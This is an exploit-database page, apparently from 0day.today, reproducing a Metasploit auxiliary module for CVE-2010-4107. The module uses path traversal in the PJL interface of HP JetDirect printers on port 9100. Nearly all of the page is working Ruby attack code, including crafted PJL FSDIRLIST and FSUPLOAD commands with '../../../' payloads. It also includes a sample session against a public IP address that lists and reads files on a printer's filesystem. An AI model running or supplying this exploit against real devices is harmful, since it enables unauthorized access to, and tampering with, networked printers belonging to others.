[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HP JetDirect PJL Interface Universal Path Traversal

Author
Myo Soe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16623
Category
remote exploits
Date add
07-08-2011
Platform
hardware
# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal
# Date: Aug 7, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.hp.com
# Version: All
# Tested on: HP LaserJet Pxxxx Series
 
##
# $Id: $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
 
##
# Sample Output:
#
#
# msf auxiliary(hp_printer_pjl_traversal) > show options
#
# Module options (auxiliary/admin/hp_printer_pjl_traversal):
#
#    Name         Current Setting  Required  Description
#    ----         ---------------  --------  -----------
#    INTERACTIVE  false            no        Enter interactive mode [msfconsole Only]
#    RHOST        202.138.16.21    yes       The target address
#    RPATH        /                yes       The remote filesystem path to browse or read
#    RPORT        9100             yes       The target port
#
#
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] cd / ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# bin TYPE=DIR
# usr TYPE=DIR
# etc TYPE=DIR
# hpmnt TYPE=DIR
# hp TYPE=DIR
# lib TYPE=DIR
# dev TYPE=DIR
# init TYPE=FILE SIZE=9016
# .profile TYPE=FILE SIZE=834
# tmp TYPE=DIR
#
#
# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true
# INTERACTIVE => true
# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp
# RPATH => /hp
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] Entering interactive mode ...
# [*] cd /hp ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# app TYPE=DIR
# lib TYPE=DIR
# bin TYPE=DIR
# webServer TYPE=DIR
# images TYPE=DIR
# DemoPage TYPE=DIR
# loc TYPE=DIR
# AsianFonts TYPE=DIR
# data TYPE=DIR
# etc TYPE=DIR
# lrt TYPE=DIR
#
# [*] Current RPATH: /hp
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > webServer/config
# [*] cd /hp/webServer/config ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# soe.xml TYPE=FILE SIZE=23615
# version.6 TYPE=FILE SIZE=45
#
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > !r version.6
# [*] cat /hp/webServer/config/version.6 ...
# [+] Server returned the following response:
#
# WebServer directory version.  Do not delete!
#
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > quit
# [*] Exited ... Have fun with your Printer!
# [*] Auxiliary module execution completed
 
 
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info={})
        super(update_info(info,
            'Name'        => 'HP JetDirect PJL Interface Universal Path Traversal',
            'Version'     => '$Revision: 1 $',
            'Description'   => %q{
                This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.
                With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
            },
            'Author'      => [
                    'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer
                    'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module                   
                    ],
            'License'     => MSF_LICENSE,
            'References'     =>
            [
                [ 'CVE', '2010-4107' ],
                [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ],            
                [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ],             
                [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],
                [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],
                [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],
                [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
            ],
            'DisclosureDate' => '2010-11-15'))
         
        register_options(
        [
 
            OptString.new('RPATH',
                    [
                        true,
                        "The remote filesystem path to browse or read",
                        "/"
                    ]
                ),
            OptBool.new('INTERACTIVE',
                                [
                                    false,
                                    "Enter interactive mode [msfconsole Only]",
                                    false
                                ]
                            ),
                 
            Opt::RPORT(9100)
        ],self.class)
         
 
    end
 
    def run
        mode = datastore['INTERACTIVE']
 
        if mode == true
            set_interactive(datastore['RPATH'])
        else
            set_onetime(datastore['RPATH'])
        end
    end
     
    def set_interactive(spath)
        action = 'DIR'
        rpath =  spath
        rfpath = ''
        tmp_path = ''
        tmp_file = ''
        cur_dir = '/'
         
        print_status("Entering interactive mode")
        stop = false
         
        set_onetime(rpath)
         
        until stop == true     
            print_status("Current RPATH: #{rpath}")
            print_status("-> 'quit' to exit")
            print_status("->'/' to return to file system root")
            print_status("->'..' to move up to one directory")
            print_status("->'!r FILE' to read FILE on current directory\r\n")
            print_status("Enter RPATH:")
            print("$ > ")
 
            tmp_path = gets.chomp.to_s 
             
 
            if tmp_path =~ /\.\./ && rpath.length > 2
                old_path = rpath
                new_path = rpath[0,rpath.rindex('/')]
                if new_path != nil
                    rpath = new_path
                else
                    rpath = '/'
                end
                rpath = '/' if rpath.length == 0
                print_status("Change to one up directory: #{rpath}")
            elsif tmp_path =~ /\!r\s/  
                cur_dir = rpath
                tmp_file = tmp_path.gsub('!r ','')
                rfpath = cur_dir + '/' + tmp_file
                rfpath = rfpath.gsub('//','/') 
                action = 'FILE'
                 
            elsif tmp_path == '/'
                rpath = '/'
            elsif rpath != '/'
                rpath = rpath + '/' << tmp_path
            else
                rpath = rpath  << tmp_path
            end
            if rpath =~ /quit/
                stop= true
                rpath = '/'
                print_status("Exited ... Have fun with your Printer!")
            else
                rpath = rpath.gsub('//','/')   
                if action == 'FILE'
                    set_onetime(rfpath,action)
                    cur_dir = rpath
                else
                    set_onetime(rpath,action)
                end
                action = 'DIR' 
            end
        end
    end
     
    def set_onetime(spath,saction =  datastore['ACTION'])
         
        rpathx  = spath
        action = saction
        rpathx = '/' if rpathx =~ /\/quit/
 
        connect
         
        dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
        file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
         
        if action =~ /DIR/
            r_cmd = dir_cmd.sub("[REPLACE]",rpathx)
            print_status("cd #{rpathx} ...")
        else
            r_cmd = file_cmd.sub("[REPLACE]",rpathx)
            print_status("cat #{rpathx} ...")  
        end
         
         
         
        recv = sock.put(r_cmd)
        res = sock.get(-1,1)
         
        if (!res)
            print_error("ERROR in receiving data!\r\n")
        else
            if res.to_s =~ /ERROR/
                print_error("Operation Not Permitted or File/DIR Not Found!\r\n")
                disconnect
                return
            end
            resx = res.to_s[res.index("\r\n")+1,res.length]
            print_good("Server returned the following response:\r\n#{resx}")
        end
         
        disconnect 
     
    end
 
 
end



#  0day.today [2024-11-15]  #